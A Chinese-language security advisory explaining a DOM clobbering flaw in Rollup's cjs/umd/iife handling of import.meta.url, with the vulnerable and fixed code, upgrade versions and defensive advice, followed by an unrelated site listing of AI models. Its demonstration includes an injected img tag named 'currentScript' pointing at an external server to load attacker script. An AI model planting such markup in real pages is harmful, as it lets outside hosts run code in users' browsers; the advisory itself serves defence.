Workbox项目中Rollup依赖的DOM安全问题分析与修复方案
问题背景
在Web开发领域,构建工具的安全性问题往往容易被开发者忽视。近期在Workbox项目依赖的Rollup构建工具中发现了一个值得警惕的安全问题——DOM干扰攻击向量。这种攻击方式通过HTML元素的命名属性干扰JavaScript的正常执行流程,可能导致严重的安全风险。
问题技术分析
DOM干扰攻击原理
DOM干扰是一种特殊的代码重用攻击技术。攻击者通过在网页中嵌入看似无害的非脚本HTML标记(如带有特定name或id属性的img标签),利用现有JavaScript代码中的"可被利用的代码片段"将其转化为可执行代码。这种攻击不需要直接注入JavaScript代码,因此能绕过许多传统的内容安全策略。
Rollup中的问题点
当使用Rollup打包使用import.meta.url的脚本,并输出为cjs/umd/iife格式时,Rollup会将meta属性替换为从document.currentScript获取的URL。问题在于,document.currentScript的查找过程可能被攻击者通过浏览器命名DOM树元素访问机制所劫持。
具体来说,Rollup在以下代码中存在安全隐患:
// 原始问题代码
var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
s.src = (_documentCurrentScript && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)
攻击者只需在页面中插入一个带有name="currentScript"属性的HTML元素(如img标签),就能控制脚本加载行为。
攻击场景演示
假设开发者使用Rollup打包以下代码:
var s = document.createElement('script');
s.src = import.meta.url + 'extra.js';
document.head.append(s);
打包后的输出包含易受攻击的代码。如果攻击者能在页面中插入:
<img name="currentScript" src="https://外部服务器/">
这将导致浏览器从外部控制的服务器加载extra.js脚本,实现潜在攻击。
问题影响范围
该问题影响以下情况:
- 使用Rollup打包的项目
- 输出格式为cjs/iife/umd
- 代码中使用import.meta特性
- 页面允许用户注入特定HTML标签且未严格过滤name/id属性
修复方案
Rollup团队已发布修复版本,通过在获取currentScript时增加类型检查来防御DOM干扰攻击。修复后的关键代码如下:
// 修复后的安全代码
document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src
修复方案增加了对元素类型的严格验证,确保只有真正的SCRIPT元素才能提供src属性值。
升级建议
开发者应立即采取以下措施:
- 将Rollup升级至安全版本(v4.22.4+或v3.29.5+)
- 对于无法立即升级的项目,可使用npm audit fix或package.json中的overrides功能强制使用安全版本
- 审查项目中是否存在允许用户注入HTML标签的功能,并加强输入过滤
防御深度思考
除了升级Rollup外,开发者还应考虑以下防御措施:
- 实施严格的内容安全策略(CSP)
- 对所有用户提供的内容进行HTML净化处理
- 避免在关键安全逻辑中依赖可能被DOM干扰影响的全局对象
- 考虑使用Trusted Types等现代浏览器安全特性
这个案例再次提醒我们,构建工具链的安全性与应用代码安全同等重要,应当纳入常规的安全审计范围。
atomcodeClaude Code 的开源替代方案。连接任意大模型,编辑代码,运行命令,自动验证 — 全自动执行。用 Rust 构建,极致性能。 | An open-source alternative to Claude Code. Connect any LLM, edit code, run commands, and verify changes — autonomously. Built in Rust for speed. Get StartedRust099- DDeepSeek-V4-ProDeepSeek-V4-Pro(总参数 1.6 万亿,激活 49B)面向复杂推理和高级编程任务,在代码竞赛、数学推理、Agent 工作流等场景表现优异,性能接近国际前沿闭源模型。Python00
MiMo-V2.5-ProMiMo-V2.5-Pro作为旗舰模型,擅⻓处理复杂Agent任务,单次任务可完成近千次⼯具调⽤与⼗余轮上 下⽂压缩。Python00
GLM-5.1GLM-5.1是智谱迄今最智能的旗舰模型,也是目前全球最强的开源模型。GLM-5.1大大提高了代码能力,在完成长程任务方面提升尤为显著。和此前分钟级交互的模型不同,它能够在一次任务中独立、持续工作超过8小时,期间自主规划、执行、自我进化,最终交付完整的工程级成果。Jinja00
Kimi-K2.6Kimi K2.6 是一款开源的原生多模态智能体模型,在长程编码、编码驱动设计、主动自主执行以及群体任务编排等实用能力方面实现了显著提升。Python00
MiniMax-M2.7MiniMax-M2.7 是我们首个深度参与自身进化过程的模型。M2.7 具备构建复杂智能体应用框架的能力,能够借助智能体团队、复杂技能以及动态工具搜索,完成高度精细的生产力任务。Python00